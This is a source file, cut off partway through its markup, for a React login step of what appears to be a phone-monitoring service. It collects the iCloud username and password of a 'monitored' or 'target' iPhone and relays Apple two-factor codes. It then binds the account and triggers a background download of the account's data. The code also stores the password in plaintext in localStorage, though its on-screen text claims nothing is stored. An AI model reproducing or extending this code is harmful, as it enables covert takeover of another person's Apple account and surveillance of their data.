import { useEffect, useRef, useState } from 'react'
import Image from 'next/image'
import dynamic from 'next/dynamic'
import { useTranslation } from 'src/utils/i18n'
import { Select, Spin, Input } from 'antd'
import { MessageInfo } from 'src/components/pop-up-window'
import { localPhoneSendEmailios } from 'src/@api/android'
import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  userBindingDevice,
  sendDownloadTime,
  iosLoginReport,
  iosLoginVerification
} from 'src/@api/login'
import { resolveBindOrderIdWithFeedback } from 'src/utils/resolveCurrentOrderId'
import {
  BINDING_OUTCOME,
  resolveBindingDeviceResponse
} from 'src/utils/bindingDeviceResult'
import { useDispatch } from 'react-redux'
import { fetchResetTime, changeDownloadTips, changeBasicVerfiyOver } from 'src/store/apps/Common'
import IosVerfiyBasicCommponents from './style'
import { useRouter } from 'next/router'
import Link from 'next/link'
import { Icon } from '@iconify/react'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import useIcloudCredentialReverify from 'src/components/ios-extreme/icloud-locked/useIcloudCredentialReverify'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const getLoginCountry = () => {
  try {
    const userData = JSON.parse(localStorage.getItem('userData'))

    return userData?.data?.country_name?.toLocaleLowerCase?.() || ''
  } catch {
    return ''
  }
}

const CodeBox = dynamic(import('src/@core/components/common/codeBox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

const BasicVerfiy = ({ setBasicOver = () => { }, goBack }) => {
  const dispatch = useDispatch()
  const { t } = useTranslation('common')

  const [useUserName, setUserName] = useState('') // iCloud账号
  const [usePassWord, setPassWord] = useState('') // iCloud密码
  const [loginLoading, setLoginLoading] = useState(false) // 账号密码验证中状态
  const [modalOpen, setModalOpen] = useState(false) // 发送短信弹窗
  const [current, setCurrent] = useState(0) // 当前验证的步骤，填写账号密码 or 填写验证码
  const [innerWidth, setInnerWidth] = useState(0) // 实时屏幕宽度
  const [showAgreeTerms, setShowAgreeTerms] = useState(false)//icoud登录协议

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsId, setSmsId] = useState('')
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [key, setKey] = useState('1')
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案
  const [codeErrorText, setCodeErrorText] = useState('') // 验证码错误（接口 em）
  const [codeBoxKey, setCodeBoxKey] = useState(0) // 错误后重置输入框

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)
  const router = useRouter()
  // 验证码提交锁：防止 CodeBox 重复 onChange / 绑定未完成时再次触发
  const codeSubmitLockRef = useRef(false)

  // auth/login 成功后调 user-binding-device，需带 order_id
  // 返回 success | already_bound | false（失败）
  const bindVerifiedICloudDevice = async (username, password) => {
    const orderId = await resolveBindOrderIdWithFeedback(t, opts =>
      MessageInfo({ type: 'error', ...opts })
    )
    if (!orderId) {
      return false
    }

    let bindingResult
    try {
      bindingResult = await userBindingDevice({
        username,
        password,
        order_id: orderId,
        verify: 1,
        platformType: 'iOS-Cloud'
      })
    } catch (e) {
      console.error('[BasicVerfiy] userBindingDevice 异常', {
        error: e,
        message: e?.message,
        orderId,
        username,
        time: new Date().toLocaleString('zh-CN')
      })
      const isTimeout =
        typeof e?.message === 'string' &&
        (e.message.includes('timeout') || e.message.includes('Request timed out'))
      MessageInfo({
        content: isTimeout
          ? t('Request timed out') || 'Request timed out'
          : t('Network error, please try again'),
        type: 'error'
      })

      return false
    }

    const { outcome, shouldContinue } = resolveBindingDeviceResponse(bindingResult, {
      platformType: 'iOS-Cloud',
      router,
      t,
      onMessage: opts => MessageInfo(opts)
    })

    if (outcome === BINDING_OUTCOME.ALREADY_BOUND) {

      return BINDING_OUTCOME.ALREADY_BOUND
    }

    if (!shouldContinue) {

      return false
    }


    return BINDING_OUTCOME.SUCCESS
  }

  // download/web 只触发后台下载，code 268435457 为「下载中」正常态
  const triggerBasicDownload = (username, password) => {
    downloadWeb({ mode: 1, username, password })
      .then(res => {
        const tip = res?.data?.ed
        if (tip) {
          MessageInfo({ content: tip, duration: 8 })
        }

        return sendDownloadTime({ username, type: 'basic_download' })
      })
      .then(() => {
        setTimeout(() => {
          dispatch(fetchResetTime())
        }, 800)
      })
      .catch(e => {
        console.error('[BasicVerfiy] downloadWeb 后台触发失败（绑定已完成）', e)
      })
  }

  // auth/login 成功 → 绑定 → 进下一步；download 异步触发
  const finishBasicVerification = async ({
    username,
    password,
    deviceUserObj,
    verifyMethod,
    trackConnectCreds = false,
  }) => {
    try {
      const bindOutcome = await bindVerifiedICloudDevice(username, password)
      if (bindOutcome === BINDING_OUTCOME.ALREADY_BOUND) {
        return false
      }
      if (bindOutcome !== BINDING_OUTCOME.SUCCESS) {
        return false
      }

      window.localStorage.setItem('Basic', 1)
      if (deviceUserObj) {
        window.localStorage.setItem('DeviceUser', JSON.stringify(deviceUserObj))
      } else {
        // 验证码成功后确保 DeviceUser 仍有账号密码
        const prev = JSON.parse(window.localStorage.getItem('DeviceUser') || '{}')
        window.localStorage.setItem(
          'DeviceUser',
          JSON.stringify({
            ...prev,
            username,
            password,
          })
        )
      }

      dispatch(changeDownloadTips(true))
      dispatch(changeBasicVerfiyOver(true))

      if (trackConnectCreds) {
      }

      setBasicOver(true)
      // 绑定已完成，下载不阻塞页面
      triggerBasicDownload(username, password)

      return true
    } catch (e) {
      console.error('[BasicVerfiy] finishBasicVerification 异常', {
        error: e,
        message: e?.message,
        time: new Date().toLocaleString('zh-CN'),
      })
      MessageInfo({ content: t('Network error, please try again'), type: 'error' })

      return false
    }
  }

  /** 兼容 { data: { ec } } 与顶层 { ec, status } 两种登录响应 */
  const getIcloudLoginPayload = res => {
    if (!res) return null
    if (res.data != null && typeof res.data === 'object' && (res.data.ec != null || res.data.status != null)) {
      return res.data
    }
    if (res.ec != null || res.status != null) return res

    return res.data ?? null
  }

  const onChange = async key => {
    if (key == 2) {
      let check = sessionStorage.getItem('icloudPhoneSmsList')
      let result = {}
      if (check) {
        result = JSON.parse(check)
      } else {
        let mode = 1

        result = await authInfo({
          mode: mode,
          username: useUserName,
          password: usePassWord
        })

        sessionStorage.setItem('icloudPhoneSmsList', JSON.stringify(result))
      }

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)
      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  // 登录 iCloud 账号
  const login = async () => {
    if (useUserName === '' || usePassWord === '') {
      MessageInfo({ content: t('Value cannot be empty'), type: 'error' })

      return
    }

    //埋点上报

    let mode = 1

    let obj = {
      mode: mode,
      username: useUserName,
      password: usePassWord,
      country: getLoginCountry()
    }
    setLoginLoading(true)

    let loginResponse
    try {
      loginResponse = await iosLoginVerification(obj)
    } catch (e) {
      console.error('[BasicVerfiy login] iosLoginVerification 异常', {
        error: e,
        message: e?.message,
        code: e?.code,
        username: useUserName,
        time: new Date().toLocaleString('zh-CN')
      })
      setLoginLoading(false)
      MessageInfo({ content: t('Network error, please try again'), type: 'error' })

      return
    }

    const data = loginResponse?.data
    if (!data) {
      setLoginLoading(false)
      MessageInfo({ content: t('Network error, please try again'), type: 'error' })

      return
    }

    // 上传ios日志
    iosLoginReport({ "platform": "ios-icloud", "site": "spyx", "s_2": 1 })

    if (data.ec === ICLOUD_EC.PASSWORD) {
      setLoginLoading(false)
      handlePasswordError(data.ec)

      MessageInfo({ content: data.em, type: 'error' })
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      iosLoginReport({ "platform": "ios-icloud", "site": "spyx", "s_3": 1 })
      setLoginLoading(false)
      MessageInfo(data.em)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))
      setCurrent(1)
      if (data?.ecurityType == 2) setKey('2')
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
        } else {
          setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
        }
      }
      setSmsPhoneListLoading(false)

      //埋点上报

    } else if (data.ec === ICLOUD_EC.LOCKED) {
      setLoginLoading(false)
      await handleEc10005({ username: useUserName, password: usePassWord })
    } else if (isIcloudOk(data)) {
      iosLoginReport({ "platform": "ios-icloud", "site": "spyx", "s_4": 1 })
      setLoginLoading(false)

      MessageInfo({ content: data.em, type: 'success', duration: 8 })

      await finishBasicVerification({
        username: useUserName,
        password: usePassWord,
        deviceUserObj: obj,
        verifyMethod: 'Device',
        trackConnectCreds: true,
      })
    } else if (data.ec === ICLOUD_EC.TERMS) {
      setLoginLoading(false)
      setShowAgreeTerms(true)
    }
    else {
      MessageInfo({ content: data.em, type: 'error' })
      setLoginLoading(false)
    }
  }

  // 设备验证码验证
  const codeDevice = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (!check) return
    if (loginLoading || codeSubmitLockRef.current) return

    setCodeErrorText('')
    codeSubmitLockRef.current = true
    setLoginLoading(true)

    try {
      let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
      deviceUser.securityCode = securityCode

      let verify
      try {
        verify = await iosLoginVerification({
          mode: 1,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          country: getLoginCountry()
        })
      } catch (err) {
        console.error('[BasicVerfiy codeDevice] iosLoginVerification 异常', {
          error: err,
          message: err?.message,
          time: new Date().toLocaleString('zh-CN')
        })
        const tip = t('Network error, please try again')
        setCodeErrorText(tip)
        codeSubmitLockRef.current = false

        return
      }

      const payload = getIcloudLoginPayload(verify)
      if (!payload) {
        const tip = t('Network error, please try again')
        setCodeErrorText(tip)
        codeSubmitLockRef.current = false

        return
      }

      if (isIcloudOk(payload) || payload.status === true) {
        iosLoginReport({ platform: 'ios-icloud', site: 'msafely', s_4: 1 })

        const ok = await finishBasicVerification({
          username: useUserName,
          password: usePassWord,
          verifyMethod: key === '2' ? 'SMS' : 'Device',
        })
        // 绑定失败允许重试；成功进下一步后组件会卸载，锁可保持
        if (!ok) codeSubmitLockRef.current = false
      } else {
        handlePasswordError(payload.ec)
        const tip = payload.em || t('Incorrect verification code Please try again')
        setCodeErrorText(tip)
        setCodeBoxKey(k => k + 1)
        codeSubmitLockRef.current = false
      }
    } finally {
      setLoginLoading(false)
    }
  }

  // 发送短信验证码
  const sendSms = async () => {
    // 已发送 / 倒计时中，避免重复点击造成重复发送
    if (btnDisable) return

    try {
      const result = await iosLoginVerification({
        mode: 1,
        username: useUserName,
        password: usePassWord,
        phoneID: smsId,
        country: getLoginCountry()
      })

      // 仅 0 / 10000 / 10004 视为发送成功，其余按失败处理并提示后端返回的原因
      const ec = result?.data?.ec
      if (!isIcloudSendOk(ec)) {
        handlePasswordError(ec)
        MessageInfo({ content: result?.data?.em || 'Failed to send the verification code, please try again', type: 'error' })
        return
      }

      let ti = sendTime
      const timeChange = setInterval(() => {
        if (ti > 0) {
          //当x>0时执行更新方法
          ti = ti - 1
          setSentTime(ti)
        } else {
          //当x=0时执行终止循环方法
          clearInterval(timeChange)
          setBtnDisable(false)
          setSendContentTips('')
          setSentTime(60)
        }
      }, 1000)

      setSentTime(60)
      setSendContentTips(t('A message containing the verification code has been sent to the target iPhone please check it'))
      setBtnDisable(true)
    } catch (e) {
      // 请求异常（断网 / 服务端错误）时不能让按钮卡死
      console.error('[sendSms] iosLoginVerification failed', e)
      setBtnDisable(false)
      setSendContentTips('')
      setSentTime(60)
      MessageInfo({ content: e?.data?.em || 'Failed to send the verification code, please try again', type: 'error' })
    }
  }

  // 短信验证码验证
  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (!check) return
    if (loginLoading || codeSubmitLockRef.current) return

    setCodeErrorText('')
    codeSubmitLockRef.current = true
    setLoginLoading(true)

    try {
      let result
      try {
        result = await iosLoginVerification({
          mode: 1,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          phoneID: smsId,
          country: getLoginCountry()
        })
      } catch (err) {
        console.error('[BasicVerfiy codeSms] iosLoginVerification 异常', {
          error: err,
          message: err?.message,
          time: new Date().toLocaleString('zh-CN')
        })
        const tip = t('Network error, please try again')
        setCodeErrorText(tip)
        codeSubmitLockRef.current = false

        return
      }

      const payload = getIcloudLoginPayload(result)
      if (!payload) {
        const tip = t('Network error, please try again')
        setCodeErrorText(tip)
        codeSubmitLockRef.current = false

        return
      }

      if (isIcloudOk(payload) || payload.status === true) {
        iosLoginReport({ platform: 'ios-icloud', site: 'msafely', s_4: 1 })

        const ok = await finishBasicVerification({
          username: useUserName,
          password: usePassWord,
          verifyMethod: 'SMS',
        })
        if (!ok) codeSubmitLockRef.current = false
      } else {
        handlePasswordError(payload.ec)
        const tip = payload.em || t('Incorrect verification code Please try again')
        setCodeErrorText(tip)
        setCodeBoxKey(k => k + 1)
        codeSubmitLockRef.current = false
      }
    } finally {
      setLoginLoading(false)
    }
  }

  // 处理验证码方式切换
  const handleSelectChange = value => {
    setSmsId(value)
  }

  // 当发送短信弹窗显示时倒计时3秒自动关闭
  useEffect(() => {
    if (modalOpen) {
      setTimeout(() => {
        setModalOpen(false)
      }, 3000)
    }
  }, [modalOpen])

  // 发送帮助邮箱
  const sendEmail = async () => {
    try {
      //获取用户邮箱
      const email = JSON.parse(localStorage.getItem('userData'))?.data.email

      // 调用发邮件接口(code:0 成功)
      await localPhoneSendEmailios({ email })

      // 触发发送邮件事件
      dataLayer.push({
        event: 'sned-guide-email'
      })
    } catch (e) {
      console.log('send Email RunTimeExection Error', e)
    }
  }

  // 监听屏幕宽度
  useEffect(() => {
    if (typeof window !== 'undefined') {
      const handlerInnerWidth = () => {
        setInnerWidth(window.innerWidth)
      }

      handlerInnerWidth()

      window.addEventListener('resize', handlerInnerWidth)

      return () => {
        window.removeEventListener('resize', handlerInnerWidth)
      }
    }
  }, [])

  // 埋点上报
  useEffect(() => {
  }, [])

  useEffect(() => {
    if (current === 1) {
    }
  }, [current])

  const StepProgress = ({ current, total }) => {
    const barWidth = 72;//宽度

    return (
      <div className="flex items-center gap-4 mb-[40px] Mlg:mb-[20px]">
        <div className="text-[20px] leading-[30px] font-medium text-[#484B60] Mlg:text-[16px] Mlg:leading-[24px] ">
          {current}/{total}
        </div>

        <div className="flex gap-x-[6px]">
          {Array.from({ length: total }).map((_, i) => {
            const active = i < current;

            return (
              <div
                key={i}
                className="h-[4px] w-[72px] Mlg:w-[51.8px] rounded-[1px]"
                style={
                  active
                    ? {
                      background: "linear-gradient(90deg, #09A6EA 1.56%, #6838F2 47.99%)",
                      backgroundSize: `${current * barWidth}px 4px`,
                      backgroundPosition: `-${i * barWidth}px 0px`,
                    }
                    : {
                      background: "#E8EDFF",
                    }
                }
              />
            )
          })}
        </div>
      </div>
    )
  }

  const [showPassword, setShowPassword] = useState(false)

  const applyTwoStepVerificationState = (data, username, password) => {
    iosLoginReport({ platform: 'ios-icloud', site: 'msafely', s_3: 1 })
    MessageInfo(data.em)

    const deviceUserObj = {
      mode: 1,
      username,
      password,
      country: getLoginCountry(),
    }

    window.localStorage.setItem('DeviceUser', JSON.stringify(deviceUserObj))
    setUserName(username)
    setPassWord(password)
    setCurrent(1)

    if (data?.ecurityType == 2) setKey('2')

    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(
        data.trustedPhoneNumbers.map(item => ({
          ...item,
          value: item.id,
          label: item.numberWithDialCode,
        }))
      )
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      if (data?.ecPhoneList === 0) {
        setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
      } else {
        setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
      }
    }

    setSmsPhoneListLoading(false)
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 1,
    updateCredentialsOnLock: false,
    onTwoStepRequired: async ({ data, username, password }) => {
      applyTwoStepVerificationState(data, username, password)
    },
    onDirectSuccess: async ({ data, username, password }) => {
      iosLoginReport({ platform: 'ios-icloud', site: 'msafely', s_4: 1 })
      MessageInfo({ content: data.em, type: 'success', duration: 8 })

      await finishBasicVerification({
        username,
        password,
        deviceUserObj: {
          mode: 1,
          username,
          password,
          country: getLoginCountry(),
        },
        verifyMethod: 'Device',
        trackConnectCreds: true,
      })
    },
  })

  // 10003（iCloud 密码不对）统一处理：退回「输入账号密码」那一步重填。
  // 已在输密码步骤、或被锁 / 重新验证弹窗正开着时跳过（见 useIcloudCredentialReverify）。
  const handlePasswordError = useIcloudCredentialReverify({ current, setCurrent, lockedFlowOpen })

  return (
    <div className='Mlg:px-[24px] max-w-[435px] w-full flex flex-col items-center relative'>
      {/* 步骤进度条 */}
      {current === 0 ? <StepProgress current={1} total={5} /> : <StepProgress current={2} total={5} />}
      {/* apple Icon */}
      <Image src='/images/apps/apple.svg' alt='img' width={60} height={69} className='w-[60px] h-[69px] Mlg:w-[35px] Mlg:h-[40px]' />

      {
        current === 0 ? // 填写账号密码步骤
          <>
            {/* 黑色标题 */}
            <p className='mt-[30px] mb-[36px] Mlg:my-[16px] text-[24px] leading-[36px] Mlg:text-[#222222] text-[#282938] text-center font-semibold'>{t('Enter the iCloud account and password of the monitored iPhone')}</p>

            {/* 输入框&按钮 */}
            <div className='w-full flex flex-col items-center Mlg:pb-[100px]'>
              <div className='max-w-[334px] w-full mx-auto flex flex-col'>
                <span className='font-medium text-[14px] leading-[26px] text-[#334062] mb-[5px] ml-[15px] lg:hidden'>{t('Apple ID')}</span>
                <Input
                  className='w-full h-[48px] Mlg:h-[40px] !bg-[#D9D9D9] !bg-opacity-30 border-none focus:[box-shadow:0px_0px_0px_1px_#454CFF] placeholder:text-[#666666] placeholder:text-opacity-50
                  border-0 rounded-[30px] px-[22px] text-[14px] leading-[26px] Mlg:text-[12px]'
                  style={{ outline: 'none' }}
                  onFocus={() => {}}
                  onChange={e => setUserName(e.target.value.trim())}
                  placeholder={t('Email or Phone Number')}
                />
              </div>
              <div className='max-w-[334px] w-full mx-auto flex flex-col mt-[24px] Mlg:mt-[10px]'>
                <span className='font-medium text-[14px] leading-[26px] text-[#334062] mb-[5px] ml-[15px] lg:hidden'>{t('Password')}</span>
                <div className='relative w-full'>
                  <Input className='w-full h-[48px] Mlg:h-[40px] !bg-[#D9D9D9] !bg-opacity-30 border-none focus:[box-shadow:0px_0px_0px_1px_#454CFF] placeholder:text-[#666666] placeholder:text-opacity-50
                    border-0 rounded-[30px] px-[22px] text-[14px] leading-[26px] Mlg:text-[12px]'
                    type={showPassword ? 'text' : 'password'}
                    value={usePassWord}
                    onFocus={() => {}}
                    onChange={e => setPassWord(e.target.value.trim())}
                    placeholder={t('Password')}
                  />
                  <Image src={showPassword ? '/extreme/open.svg' : '/extreme/close.svg'} width={18} height={18} alt='' className='absolute top-0 bottom-0 my-auto right-[15px] cursor-pointer Mlg:w-[15px] Mlg:h-[15px]' onClick={() => setShowPassword(!showPassword)} />
                </div>
              </div>
              <a className="max-w-[334px] w-full mx-auto mt-[16px] Mlg:mt-[12px] text-[12px] leading-[20px] text-[#2405F2] cursor-pointer"
                href="https://support.apple.com/en-us/102627" target="_blank" rel="noopener noreferrer"
                onClick={() => {}}>
                <div className="flex items-center justify-end gap-[4px]">
                  <span>{t('Need help finding Apple ID')}</span>
                  <Icon icon="teenyicons:top-right-outline" />
                </div>
              </a>
              {showAgreeTerms && (
                <div className='fixed inset-0 z-[9999] bg-black/50 flex justify-center items-center animate-fadeIn px-[15px]'>
                  <div className='relative w-[400px] bg-white border border-[#f0f0f0] rounded-[8px] p-[20px] flex flex-col items-center text-center'>
                    <button
                      onClick={() => setShowAgreeTerms(false)}
                      className='absolute top-[10px] right-[10px] text-[#666] hover:text-[#000000cc] hover:bg-[#f0f0f0] text-[16px] font-bold leading-none p-2 rounded-[6px]'
                      aria-label='Close'
                    >
                      <Icon icon="ri:close-large-fill" />
                    </button>
                    <p className='text-[18px] leading-[26px] font-bold mb-[8px]'>
                      {t('Action required')}
                    </p>
                    <p className='text-[16px] leading-[24px] text-[#000000cc] mb-[16px]'>
                      {t('Please agree to the latest iCloud Terms and Conditions on your device before logging in')}
                    </p>
                    {/* ⛔ 已隐藏：跳 /guide/icloud-terms（msafely 没有该文章页）2026-09-21
                    <Link
                      href='/guide/icloud-terms'
                      className='p-[6px_15px] border border-[#DDDDDD] text-[#000] rounded-[8px] hover:border-[#5c9dfc] hover:text-[#5c9dfc] transition shadow-[0px_2px_24px_0px_#0000001A]'
                    >
                      {t('Read Guide')}
                    </Link>
                    */}
                  </div>
                </div>
              )}
              {/* 二步验证提示 */}
              <div className='max-w-[340px] w-full mt-[24px] flex items-start justify-center p-[12px] bg-[#FFFFFF] rounded-[8px] shadow-[0px_1px_6px_0px_#28293826]'>
                <Image
                  src='/images/apps/hint.svg'
                  className='flex w-[24px] h-[24px] mr-[12px]'
                  alt='img'
                  width={24}
                  height={24}
                />
                <p className='text-[14px] leading-[22px] Mlg:text-[12px] Mlg:leading-[20px] text-[#282938]'>
                  {t('iCloud account is used only for Apples official login verification we do not store any information')}
                  <br />
                  {t('After clicking Connect a two-step verification code or SMS will be sent to the target iPhone from Apple official')}
                </p>
              </div>

              {router.asPath.includes('/ios/setup') ||
                <div className='w-full flex justify-center items-center mt-6'>
                  <button
                    className={`${loginLoading ? 'opacity-70' : ''
                      } w-full h-[48px] Mlg:h-[42px] mx-auto bg-[#FFCF55] text-[#222222] text-[16px] font-[600] rounded-[41px] flex justify-center items-center`}
                    onClick={() => {
                      if (loginLoading) return
                      login()
                    }}
                  >
                    {t('Connect')}
                    {loginLoading && (
                      <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                    )}
                  </button>
                </div>}
            </div>

            {/* 发送短信触发文案 */}
            {/* <p
              className='text-[14px] text-[#2405F2] text-center font-[400] leading-[22px] mt-[16px] Mlg:mt-[15px] cursor-pointer'
              onClick={() => {
                sendEmail()
                setModalOpen(true)
              }}
            >{t('How to get the required conditions')}</p> */}

            {/* 发送短信弹窗 */}
            <div className={`w-max max-w-[90%] absolute top-[50%] left-[50%] flex items-center justify-center ${!modalOpen ? 'hidden' : ''} z-[5254]`} onClick={() => setModalOpen(false)}>
              <div className="w-full max-w-[420px] xs:max-w-[360px] transform -translate-x-1/2 -translate-y-1/2 bg-black shadow-4xl rounded-[12px]">
                <div className="p-[22px_19px_27px_16px] flex flex-col items-start justify-center">
                  <p className="w-full text-[16px] text-white font-[Poppins] font-[400] leading-[24px] text-left">
                    {t('A guidance email has been sent to your mailbox')}
                  </p>
                  <p className="w-full text-[16px] text-white font-[Poppins] font-[400] leading-[24px] text-left mt-[5px]">
                    {t('If not received it please check in spam or click again')}
                  </p>
                </div>
              </div>
            </div>

            {/* 返回按钮 */}
            {router.asPath.includes('/ios/setup') &&
              <div className='w-full mx-auto fixed bottom-0 left-[150px] Mlg:left-0 right-0 bg-white border-t border-[#E5E7EB]'>
                <div className='flex justify-center w-full p-5 Mlg:px-[16px] bg-[#fff] mx-auto'>
                  <div className='w-full lg:w-[620px] flex justify-between'>
                    <button onClick={goBack}
                      className="border border-[#454CFF] bg-white rounded-[18px] flex items-center justify-center py-[5px] px-[17px] text-[#454CFF]"
                    >
                      <Icon icon="ep:arrow-left-bold" className="w-[14px] h-[14px] mr-[6px] flex-shrink-0" />
                      <span className="text-[16px] leading-[24px] font-[600] block">{t('BACK')} </span>
                    </button>

                    <button
                      onClick={() => {
                        if (loginLoading) return
                        login()
                      }}
                      className={`bg-[#FFCF55] rounded-[18px] flex items-center py-[5px] px-[17px] ${loginLoading && 'opacity-70'}`}
                    >
                      <span className='text-[16px] leading-[24px] font-[600] block'>{t('CONNECT')}</span>
                      {loginLoading && (
                        <div className='w-[20px] h-[20px] border-[3px] border-[#2e2020] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                      )}
                      <Icon icon="ep:arrow-right-bold" className="w-[14px] h-[14px] ml-[6px] flex-shrink-0" />
                    </button>
                  </div>
                </div>
              </div>}
          </>
          :
          <>
            {/* 黑色标题 */}
            <p className='mt-[30px] mb-[36px] Mlg:my-[16px] text-[24px] leading-[36px] Mlg:text-[#222222] text-[#282938] text-center font-semibold'>
              {t('Choose a Verification Method')}
            </p>
            <div className='w-[310px] Mlg:w-full'>
              <div className='w-full h-[27px] flex items-center mb-[26px] Mlg:mb-[30px]'>
                <div
                  className={`${key == '1'
                    ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                    : 'text-[14px] text-[#000] border-b-[#FFF]'
                    } h-[27px] border-b-[2px] flex items-center cursor-pointer`}
                  onClick={() => {
                    if (key == '1') return
                    setCodeErrorText('')
                    setKey('1')
                  }}
                >
                  {t('Device')}
                </div>
                <div
                  className={`${key == '2'
                    ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                    : 'text-[14px] text-[#000] border-b-[#FFF]'
                    } ml-[18px] h-[27px] flex items-center border-b-[2px] cursor-pointer`}
                  onClick={() => {
                    if (key == '2') return
                    if (smsPhoneListDisabled) {
                      MessageInfo(smsErrorText)
                    } else {
                      setCodeErrorText('')
                      setKey('2')
                    }
                  }}
                >
                  {t('SMS')}
                </div>
              </div>
              {key == '1' && (
                <>
                  <Spin spinning={loginLoading}>
                    <CodeBox
                      key={`device-${codeBoxKey}`}
                      length={6} // 输入框数量
                      inputType='numeric' // 输入框输入类型
                      size={innerWidth > 768 ? 45 : 42} // 输入框大小
                      gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                      styles={{
                        background: '#F5F6F7',
                        borderRadius: '8px',
                        color: '#494949',
                        fontFamily: 'Poppins',
                        fontSize: '26px'
                      }} // 统一设置所有框的样式
                      onChange={codeDevice} // 验证码输入完毕时的回调
                    />
                  </Spin>
                  {codeErrorText ? (
                    <p className='mt-[12px] text-center text-[13px] leading-[20px] text-[#E5484D]'>{codeErrorText}</p>
                  ) : null}
                  <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                    {t('A verification code has been sent to the target iPhone Enter the verification code')}
                  </p>
                </>
              )}
              {key == '2' && (
                <>
                  <div className='h-[45px] Mlg:h-[40px] mb-[24px] Mlg:mb-[20px] flex'>
                    <Select
                      defaultValue={defaultSmsPhone}
                      style={{
                        flex: 1,
                        height: '100%'
                      }}
                      suffixIcon={
                        smsPhoneListLoading ? (
                          <div className='w-[18px] h-[18px] border-[3px] border-b-[rgba(244,245,246,0.92)] rounded-[50%] inline-block box-border animate-spin mr-[5px]'></div>
                        ) : (
                          <Image
                            className='mr-[5px]'
                            src='/images/user-verify/dropdown.svg'
                            width={14}
                            height={0}
                            alt='dropDown'
                          />
                        )
                      }
                      disabled={smsPhoneListDisabled}
                      onChange={handleSelectChange}
                      options={smsPhoneList}
                    />
                    <button
                      disabled={btnDisable}
                      className='w-full max-w-max min-w-[85px] h-full flex justify-center items-center'
                      style={{
                        opacity: btnDisable ? 0.7 : 1,
                        background: '#FFCF55',
                        padding: '0px 21px',
                        marginLeft: '10px',
                        color: '#1B1C2B',
                        borderRadius: '41px',
                        fontSize: '18px'
                      }}
                      onClick={sendSms}
                    >
                      {btnDisable ? sendTime : t('Send')}
                    </button>
                  </div>

                  {sendContentTips != '' && (
                    <p className='text-center mb-[24px] text-[12px] text-[#9A9A9E]'> {sendContentTips}</p>
                  )}
                  <Spin spinning={loginLoading}>
                    <CodeBox
                      key={`sms-${codeBoxKey}`}
                      length={6} // 输入框数量
                      inputType='numeric' // 输入框输入类型
                      size={innerWidth > 768 ? 45 : 42} // 输入框大小
                      gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                      styles={{
                        background: '#F5F6F7',
                        borderRadius: '8px',
                        color: '#494949',
                        fontFamily: 'Poppins',
                        fontSize: '26px'
                      }} // 统一设置所有框的样式
                      onChange={codeSms} // 验证码输入完毕时的回调
                    />
                  </Spin>
                  {codeErrorText ? (
                    <p className='mt-[12px] text-center text-[13px] leading-[20px] text-[#E5484D]'>{codeErrorText}</p>
                  ) : null}
                  <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                    {t('Enter the verification code')}
                  </p>
                </>
              )}

              {/* 返回按钮 */}
              {router.asPath.includes('/ios/setup') &&
